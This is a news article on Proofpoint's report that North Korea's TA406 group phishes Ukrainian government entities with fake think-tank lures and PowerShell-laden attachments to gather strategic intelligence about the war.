North Korean state-sponsored hackers launched attacks against government entities and other organisations in Ukraine. It looks like the rogue state wants to determine if Russia will request more troops or armaments in an ongoing war.
North Korea has been running phishing campaigns aimed at credential harvesting and malware delivery. Contrary to the Russian cyberwarfare activities that are oriented at getting tactical battlefield information or causing disruption, North Korean hackers focus on gathering strategic intelligence.
They’re interested in Ukraine’s political and military situation to support the rogue state’s decision-making regarding military commitments to Russia.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments,” Proofpoint said in a report.
The security firm labels the threat actor TA406, but it is also known as Opal Sleet or Konni. Its activities previously overlapped with Kimsuky and Thallium. Proofpoint has been tracking cyberattacks against Ukraine by these hackers since February 2025.
Rely on impersonation and phishing
The hackers from the Democratic People's Republic of Korea (DPRK) impersonate members of fictitious think tanks and send phishing emails, luring targets with politically relevant content, based heavily on recent events.
The phishing emails contain attached HTML and CHM (Microsoft Compiled HTML Help) files with embedded malicious PowerShell scripts that deploy malware. For detection evasion, hackers pack files into a password-protected RAR archive.
One phishing example, observed by Proofpoint, included a fictitious senior fellow at a non-existent think tank called the Royal Institute of Strategic Studies. The lure was related to former Ukrainian military leader Valeriy Zaluzhnyi.
If a user opens the malicious HTML file, it runs a PowerShell script that downloads and executes additional packages.
“The next stage PowerShell file executes several commands to gather information about the victim host. These include ipconfig /all, systeminfo, as well as commands to grab recent file names and disk information and commands to use WMI to gather information about any anti-virus tools installed on the host,” the report explains.
TA406 has also been observed attempting to gather credentials by sending fake Microsoft security alert messages from Proton Mail accounts, or delivering ZIP archives with benign PDFs as well as malicious LNK files that execute Base64-encoded PowerShell.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” the researchers conclude.
Your email address will not be published. Required fields are markedmarked